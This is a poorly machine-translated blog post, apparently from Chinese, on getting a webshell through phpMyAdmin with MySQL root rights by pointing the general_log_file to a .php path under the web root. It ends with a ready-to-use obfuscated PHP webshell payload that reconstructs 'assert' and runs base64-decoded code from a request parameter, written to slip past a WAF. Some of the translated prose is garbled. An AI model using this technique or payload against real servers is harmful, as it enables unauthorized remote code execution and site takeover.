Narrator: How do I getshell in a scenario with a WAF and an into outfile in MySQL?
Tilt rotation
Email:[email protected]
Submission Contact: [Email protected]
The first environment is as follows:
- Os:windows 2003
- Waf:safe Dog 4.0 Official edition
- phpmyadmin:4.7 (many can)
- mysql:5.5+
- php:5.3
- apache:2.x
is currently into outfile
disabled, and WAF is also intercepted when writing to a file.
So we're trying to getshell through a big hole in the brain.
(必须是mysql root权限)
After logging in to phpMyAdmin, view the global variables:
Found itgeneral log file
Here is the log that stores each SQL statement execution (including the SQL statement itself)
However general log
, the variable must be on state, which means enable.
At this point we turn general log
ON
on and then go to change general log file
the address to our webshell
absolute path.
At each change general log file
, MySQL will determine if the log file exists and will be created automatically if it does not exist.
The file is now created, and the file contents hold the log information for the last SQL statement.
MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 QuerySHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit
Next, we directly query SQL, each sentence will be written to this shell.php
Because of the WAF, we run Webshell in the form of a remote inclusion.
In our remote address, put the function name, let the server side access it, and then load into memory, go directly to call this function, and then to receive our submitted PHP code.
Please see an article about Chopper-free killing.
The following is attached to a SQL query to avoid the shell statement, so that you can encounter such situations directly use:
SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"
There is no interception on this side:
Article on to here, these days more busy, have not how to update, thank you all have been support!
phpMyAdmin New Posture Getshell